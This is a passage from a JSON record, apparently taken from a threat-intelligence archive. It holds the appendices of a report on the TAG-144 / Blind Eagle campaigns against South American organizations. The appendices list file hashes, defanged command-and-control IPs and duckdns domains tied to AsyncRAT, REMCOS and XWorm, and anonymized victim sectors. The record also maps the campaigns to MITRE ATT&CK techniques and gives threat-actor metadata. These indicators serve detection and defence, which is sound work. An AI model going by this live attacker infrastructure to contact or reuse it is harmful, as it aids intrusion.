Hashes:\r\n0242cb2f175959083d6e335291a6010810adea229262638b4c4519b73a0235e1\r\n02c4dc743727fc80a96de9949ff6c70311359681e04ae569a8416e235025de62\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899\r\n05869e6f626ef7a1638b89d0b95fc5c74f8dd4e794da18170f9fab3c5837f97f\r\n0648201ff2ff9fd17389046da374d2df92bab623e52016c2502604a1c9acab60\r\n068a73b181fb2018e45d5740d84c4951aab9208efe3dc2affc4be9a98e30a36d\r\n0729eb04a031abe19ff9a06cc85f5d634fb519cc1c4572552cda2279fd41598d\r\n08f5d691d0bda5a166789bc7544258713752fb2d0349a3440fde1e2754cb1511\r\n09906220a031d47b63209142dae794c1823d413450641d06a96086e80487d648\r\n0a81caad21e4cba59297617001902807e5ec3f97bf0eb7061da9e473aaa73cf6\r\n0af4ff2ba05c033fc79f75d349aa4219e311f9dbbb7b1c6b653c0b7f196b4ae3\r\n0b80cf85d6c8ac7ef2c3f133db86ff11eb0f3e94d579d40c70c1f8a26e395af3\r\n0b8d9cf2c5e7185b13d65c3d442800005ba741cc03fa7ba09c969b63855ad851\r\n0bb560a3de9032a34f50ffaf900d69a060ff858295fca93f2e00c99de4f5317f\r\n0bd12552db5235ed9ee92a1c8bd4779070cef15a4dc8992bc06cfcec81cd9e7d\r\n0c0e3db172d6bebd207ef644014b3189fc4743a8ae82326e662218ad041926fd\r\n0e0195998fe478bbfc06a28706f21ae830f15765995cad680b955baf23eb9b86\r\n0e5a768a611a4d0ed7cb984b2ee790ad419c6ce0be68c341a2d4f64c531d8122\r\n0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1\r\n1039d25f6a62b5d00c636bd77bf72058bc20ef21f4ca41c38ae6fe404b2d5359\r\n117d0c3fed7afe29a633ef9ae9a7ce91b07d42f0dfee74623339f55d539ccfe9\r\n1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81\r\n1311b0d5a434cd5eea9622e4eb01de6546cb147f70807c15f95070c565147837\r\n13e9e508c4a67f7c026a0c3edcd604a445d66454044c5d74ba2e4f31fa26c0a5\r\n14bf934d99de4db93cdf536ef2ab1e5b8e5a0c0eed98a25904672de5d110059e\r\n15083899111221e370e7c2f45b19f23fd88ca40d3f1c2c6d19324fd6414c609e\r\n1d26170ba16131f0321cf65e19a0ce4acfc7d5dc7cb8b020431019eaf5f888e8\r\n1da1eabae5779e22e59d82a7f46e4b940aff525a33254624de9ee320ac54dd99\r\n1e850dc9786d670c97ed064b1af87aab966be58d80051476918b0183b0069b3a\r\nhttps://www.recor
dedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 22 of 34\n\n20e7dfbd5c7c54d29427ad3868ffe0e833e24f795387b118143c0b613bf5fac1\r\n21aa261a83bd6d2b435ff38d3411c82bc7fa91b82adac99eb5c2153ac34f30e3\r\n239bcf64fc9d0b5dbcd7e1351444244695bd530e510846e0bb91055ca2e97ed1\r\n272eef21aa697cc7925fa303fe3aecb578cf2f572c7501a9eb2d944849dfe46c\r\n277d6e7900cfef05715f9a79f0af411e37dbd37c91590836ffb4af821a708f66\r\n27b3d1c60757aaef5baf68864dd9dc9cceb6b688be4c5ad7cfc1670035789f3e\r\n27d35c0be9120154906cb612565f02998c5fc9f7cdcd790b92c8f5a6e1bf6396\r\n27f03ad67e31c0e25e979c905629b80d98867e8e542cfabaa8a8be581a85aa37\r\n2851dc29c6a6abc8688b730b70ff9cb8f5e63facb71057fa600201c15877ca84\r\n28afc5b80ede7c040ec56b093f3748c7eb29db220901d720380eb07cf3eeb294\r\n297dcbc929793df0237cf7e5d78945873add6d6851e890339a45878a4e3ddb74\r\n2a2e92fc86be8adf429e4172368dfacd3fd0c157d0f602d713acf82c89932edf\r\n2b0314caa8db6210c626bcd9773c0d3c848a05721c49024b3bffd34b8a21724b\r\n2cc8aa53e3e30f1c09950e4ae1262f8df3588b8e31775318ef951fd994b5b918\r\n2d4db0e8a6a2dfa3806696d22f25bcb9cd25dae881a248d6746c306a7ca0bc7a\r\n2e82689cc5a2d9beb0bce4da3330122e5cad896a04b1296c5fb9b54fe3e92f52\r\n2fc4aaeaf8eba6c4d8cc4622ac7693c65cd3cec421f611b43dd252c18816e551\r\n302134f47d1724a2b3c6e06e53831caf2ac86cc9b94f470c8f8641b1cb4026f0\r\n319a560130015fa1c53149234321ba5313e5a93f06de6675f5da4a8c2dfa1cf1\r\n31a5729f1bcb928bab9a9606e4f3c3d12012332a633eb3fa1d26c014917f891b\r\n31f58aa1dd25b7a341e4de125ef6adc4268af4a97501bf0882adb7af244773f7\r\n32b8929c4bf6ce8f74c470b6f1aff0be75ae9ca7df66ace39f2a849095427a73\r\n3378b49278032fcabc8f4b4e6622eb87cffba645987b1f81161905452aef175a\r\n33fddd6a9d4bece9be47be6d623da228e4cb69f5c51aaf61ffb75c803957396d\r\n359eac88704e65913b7331affecd4ca911b52f000e68599f24af96d6ad71b82f\r\n370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93\r\n38019ee88bba4b4ceb159643c5a2a2608b628ef673e7ab7516ef47f6f6230618\r\n3a625c677ba81aa0639129c07cf7991e39be78e9e1b23bb31005e75c19de8580
\r\nPossibly Compromised Network Devices:\r\nAppendix C: Cluster 1 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 1 Government 146[.]70[.]137[.]90 2025-05-20 2025-05-23\r\nVictim 1 Government 146[.]70[.]51[.]42 2025-05-30 2025-06-09\r\nVictim 2 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 3 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 4 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\nVictim 4 Government 146[.]70[.]83[.]218 2025-05-26 2025-05-26\r\nVictim 5 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\nVictim 5 Government 146[.]70[.]51[.]42 2025-05-20 2025-05-20\r\nVictim 6 Education 146[.]70[.]51[.]42 2025-05-27 2025-06-03\r\nVictim 7 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-05\r\nVictim 8 Government 146[.]70[.]137[.]90 2025-05-12 2025-06-09\r\nVictim 9 Government 146[.]70[.]137[.]90 2025-05-24 2025-06-06\r\nVictim 9 Government 193[.]56[.]253[.]66 2025-06-10 2025-06-10\r\nVictim 10 Government 146[.]70[.]137[.]90 2025-05-08 2025-05-30\r\nVictim 11 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-09\r\nVictim 12 Healthcare 146[.]70[.]137[.]90 2025-04-30 2025-06-09\r\nVictim 12 Healthcare 193[.]56[.]253[.]66 2025-06-13 2025-06-13\r\nVictim 12 Healthcare 45[.]133[.]180[.]26 2025-05-06 2025-05-09\r\nVictim 13 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-10\r\nVictim 14 Government 146[.]70[.]137[.]90 2025-06-06 2025-06-09\r\nVictim 15 Government 146[.]70[.]83[.]218 2025-05-28 2025-05-29\r\nVictim 16 Retail 146[.]70[.]83[.]218 2025-05-27 2025-05-30\r\nVictim 17 Transport 146[.]70[.]83[.]218 2025-05-26 2025-05-29\r\nVictim 18 Education 146[.]70[.]83[.]218 2025-05-29 2025-05-29\r\nVictim 19 Education 45[.]133[.]180[.]130 2025-03-19 2025-03-26\r\nVictim 19 Education 146[.]70[.]57[.]58 2025-04-02 2025-04-02\r\nVictim 19 Education 45[.]133[.]180[.]154 2025-03-31 2025-04-08\r\nAppendix D: Cluster 2 IP Addresses\r\nIP Address ASN Suspected Type Malware Families\r\n45[.]77[.]72[.]102 AS20473 Virtual Private Server AsyncRAT\r\n64[.]188[.]9[.]172 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]173 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]175 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]177 AS36352 Proxy Server AsyncRAT\r\n179[.]14[.]8[.]131 AS27831 Colombian ISP AsyncRAT\r\n181[.]131[.]217[.]63 AS13489 Colombian ISP AsyncRAT\r\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 2\r\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2024[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-23 2025-03-12\r\ndeadpoolstart2025[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-21\r\ndeadpoolstart2025[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-13 2024-12-13\r\ndeadpoolstart2025[.]duckdns[.]org 192[.]169[.]69[.]26 2024-12-16 2025-05-20\r\ndeadpoolstart2026[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-09\r\ndeadpoolstart2026[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-20 2024-12-20\r\ndeadpoolstart2026[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-25 2025-07-18\r\ndeadpoolstart2027[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-24 2025-07-14\r\ndeadpoolstart2027[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-07 2024-11-07\r\ndeadpoolstart2027[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-12 2025-03-12\r\ndeadpoolstart2028[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-29 2025-07-16\r\ndeadpoolstart2028[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-06 2024-11-07\r\ndeadpoolstart2029[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-22 2025-06-30\r\ndeadpoolstart2029[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-12\r\ndeadpoolstart2030[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-25 2025-07-15\r\ndeadpoolstart2030[.]duckdns[.]org 172[.]93[.]160[.]188 2024-10-30 2024-10-30\r\ndeadpoolstart2030[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-03\r\ndeadpoolstart2033[.]duckdns[.]org 191[.]88[.]249[.]175 2025-02-12 2025-02-12\r\ndeadpoolstart2034[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-27 2025-03-27\r\ndeadpoolstart2035[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-28 2025-01-28\r\ndeadpoolstart2035[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-31 2025-07-17\r\ndeadpoolstart2036[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-29 2025-02-03\r\ndeadpoolstart2036[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-18\r\ndeadpoolstart2037[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-30 2025-02-03\r\ndeadpoolstart2037[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-03 2025-07-17\r\ndeadpoolstart2038[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-05 2025-02-05\r\ndeadpoolstart2041[.]duckdns[.]org 179[.]14[.]8[.]131 2025-06-09 2025-06-09\r\ndeadpoolstart2044[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-09 2025-05-09\r\ndeadpoolstart2044[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-12 2025-03-12\r\ndeadpoolstart2049[.]duckdns[.]org 179[.]14[.]8[.]131 2025-07-11 2025-07-11\r\ndeadpoolstart2049[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-12 2025-04-12\r\ndeadpoolstart2051[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-02 2025-07-18\r\ndeadpoolstart2051[.]duckdns[.]org 177[.]255[.]84[.]173 2025-04-29 2025-05-01\r\ndeadpoolstart2052[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2053[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2054[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-26 2025-05-26\r\ndeadpoolstart2059[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-23 2025-05-23\r\ndeadpoolstart2060[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-29 2025-07-21\r\ndeadpoolstart2061[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-17 2025-06-30\r\ndeadpoolstart2061[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-30 2025-07-17\r\ndeadpoolstart2063[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-29 2025-06-29\r\ndeadpoolstart2064[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-03 2025-07-04\r\ndeadpoolstart2065[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-04 2025-07-05\r\nAppendix F: Cluster 2 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 20 Government 64[.]188[.]9[.]173 2024-10-11 2024-10-22\r\nVictim 20 Government 64[.]188[.]9[.]177 2024-10-16 2024-10-16\r\nVictim 21 Transport 64[.]188[.]9[.]173 2024-10-11 2024-10-21\r\nVictim 22 Education 64[.]188[.]9[.]177 2024-10-16 2024-10-31\r\nVictim 23 Education 64[.]188[.]9[.]177 2024-10-19 2024-10-19\r\nVictim 24 Government 64[.]188[.]9[.]172 2024-10-01 2024-10-06\r\nVictim 25 Government / Defense 64[.]188[.]9[.]172 2024-10-11 2024-10-15\r\nVictim 26 Government 64[.]188[.]9[.]173 2024-10-24 2024-10-24\r\nVictim 27 Retail 64[.]188[.]9[.]177 2024-12-20 2024-12-20\r\nVictim 28 Oil 64[.]188[.]9[.]173 2024-10-11 2024-10-30\r\nAppendix G: Cluster 3 IP Addresses\r\nIP Address ASN Type Malware Families\r\n181[.]131[.]216[.]206 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]218[.]182 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]219[.]42 AS13489 Colombian ISP REMCOS RAT, AsyncRAT\r\nAppendix H: Cluster 4 IP Addresses\r\nIP Address ASN Suspected Type Malware Family\r\n45[.]135[.]232[.]38 AS198953 Virtual Private Server AsyncRAT\r\n46[.]246[.]82[.]9 AS42708 Virtual Private Server XWorm\r\n89[.]117[.]23[.]25 AS40021 Virtual Private Server REMCOS RAT\r\n178[.]73[.]218[.]8 AS42708 Virtual Private Server AsyncRAT\r\n181[.]235[.]3[.]0 AS3816 Colombian ISP AsyncRAT\r\n191[.]93[.]113[.]151 AS27831 Colombian ISP AsyncRAT\r\nAppendix I: Cluster 5 Domains\r\nDomain First Seen Last Seen Malware Families\r\n2seguro2025[.]duckdns[.]org 2025-04-01 2025-07-09 N/A\r\nansy10jun[.]duckdns[.]org 2025-06-21 2025-06-29 AsyncRAT\r\nansy1703[.]duckdns[.]org 2025-03-20 2025-06-14 AsyncRAT\r\nasegurar2octubre[.]duckdns[.]org 2025-03-12 2025-07-17 AsyncRAT\r\nasegurar3octubre[.]duckdns[.]org 2025-05-08 2025-07-18 AsyncRAT\r\nbb2023[.]duckdns[.]org 2025-06-13 2025-07-10 N/A\r\ndcabril[.]duckdns[.]org 2025-06-13 2025-07-19 N/A\r\ngotemburgoxm[.]duckdns[.]org 2025-05-07 2025-07-15 REMCOS RAT, XWorm\r\nromanovas[.]duckdns[.]org 2025-03-04 2025-06-19 LimeRAT\r\nAppendix J: Original SVG Attachment\r\nAppendix K: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nCommand and Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand and Control: Encrypted Channel: Asymmetric Cryptography T1573.002\r\nCommand and Control: Encrypted Channel: Symmetric Cryptography T1573.001\r\nCommand and Control: Ingress Tool Transfer T1105\r\nDefense Evasion: Modify Registry T1112\r\nDiscovery: System Information Discovery T1082\r\nDiscovery: Query Registry T1012\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nInitial Access: Spearphishing Link T1566.002\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Infrastructure: Malvertising T1583.008\r\nResource Development: Compromise Infrastructure: Server T1584.004\r\nSource: https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations"
	],
	"report_names": [
		"tag-144s-persistent-grip-on-south-american-organizations"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-10T02:00:05.390055Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"Imminent Monitor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-10T02:00:04.58656Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-10T02:00:03.147197Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439143,
	"ts_updated_at": 1775826749,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.pdf",
		"text": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.txt",
		"img": "https://archive.orkl.eu/ba28e9414078c889952e5f33706d74ff2e7184f9.jpg"
	}
}